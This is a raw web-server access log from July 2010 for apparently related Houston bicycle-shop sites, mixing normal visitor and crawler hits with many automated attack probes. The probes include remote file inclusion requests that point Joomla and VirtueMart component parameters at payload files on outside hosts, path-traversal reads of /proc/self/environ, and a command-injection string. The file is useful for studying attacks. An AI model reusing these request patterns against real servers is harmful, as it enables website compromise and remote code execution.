62.141.56.49 - - [10/Jul/2010:06:03:33 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.49 - - [10/Jul/2010:06:03:33 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.49 - - [10/Jul/2010:06:03:37 -0700] "GET /logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:06:08:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:06:08:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:06:08:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:06:11:30 -0700] "GET /logs/ HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
74.222.3.90 - - [10/Jul/2010:06:16:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "page_test (larbin2.6.3@unspecified.mail)" "www.svbikes.com"
74.222.3.90 - - [10/Jul/2010:06:16:06 -0700] "GET / HTTP/1.0" 200 1748 "-" "page_test larbin2.6.3@unspecified.mail" "www.svbikes.com"
174.138.163.178 - - [10/Jul/2010:06:16:13 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.254.36.102 - - [10/Jul/2010:06:27:11 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
65.254.36.102 - - [10/Jul/2010:06:27:11 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
65.254.36.102 - - [10/Jul/2010:06:27:11 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:06:31:04 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:06:31:17 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:06:32:30 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:06:35:01 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:45:08 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:45:09 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:45:09 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:06:50:29 -0700] "GET /bullitinboard/viewtopic.php?p=4311 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:06:55:55 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:06:55:55 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:06:55:56 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:56:01 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:56:41 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:06:57:28 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:06:57:28 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:06:57:28 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:06:58:25 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:07:00:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:07:00:53 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:07:00:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
64.89.247.4 - - [10/Jul/2010:07:01:05 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:07:02:47 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:07:02:47 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:07:02:47 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
76.30.223.79 - - [10/Jul/2010:07:02:51 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)" "www.svbikes.com"
76.30.223.79 - - [10/Jul/2010:07:02:51 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)" "www.svbikes.com"
76.30.223.79 - - [10/Jul/2010:07:02:54 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)" "www.svbikes.com"
69.80.227.231 - - [10/Jul/2010:07:05:32 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:32 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:32 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:32 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:34 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:35 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:50 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:50 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:51 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:51 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:52 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [10/Jul/2010:07:05:52 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:07:24:14 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
98.194.253.91 - - [10/Jul/2010:07:25:47 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
98.194.253.91 - - [10/Jul/2010:07:25:48 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
193.105.210.172 - - [10/Jul/2010:07:36:23 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 1835008 "http://svbikes.com/logs/access_100310.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "svbikes.com"
87.250.252.242 - - [10/Jul/2010:07:51:24 -0700] "GET /bullitinboard/viewtopic.php?p=13856 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:07:58:18 -0700] "GET /logs/access_091210.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
89.108.64.192 - - [10/Jul/2010:07:58:19 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
89.108.64.192 - - [10/Jul/2010:07:58:19 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
70.138.53.175 - - [10/Jul/2010:08:03:55 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
70.138.53.175 - - [10/Jul/2010:08:03:56 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
70.138.53.175 - - [10/Jul/2010:08:04:14 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/profile/1742501?searchterm=Houston, TX 77024, USA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
70.138.53.175 - - [10/Jul/2010:08:04:24 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
70.138.53.175 - - [10/Jul/2010:08:04:26 -0700] "GET /Employeesite/ HTTP/1.1" 401 - "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "www.svbikes.com"
217.23.12.147 - - [10/Jul/2010:08:08:15 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "bicyclestoreshouston.com"
217.23.12.147 - - [10/Jul/2010:08:08:16 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "bicyclestoreshouston.com"
217.23.12.147 - - [10/Jul/2010:08:08:16 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "bicyclestoreshouston.com"
92.241.175.4 - - [10/Jul/2010:08:22:57 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:22:57 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:23:08 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:28:33 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:28:36 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:29:05 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
92.241.175.4 - - [10/Jul/2010:08:29:46 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:09 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:09 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:09 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:10 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:10 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:10 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:26 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:26 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:26 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:30 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:30 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [10/Jul/2010:08:41:30 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
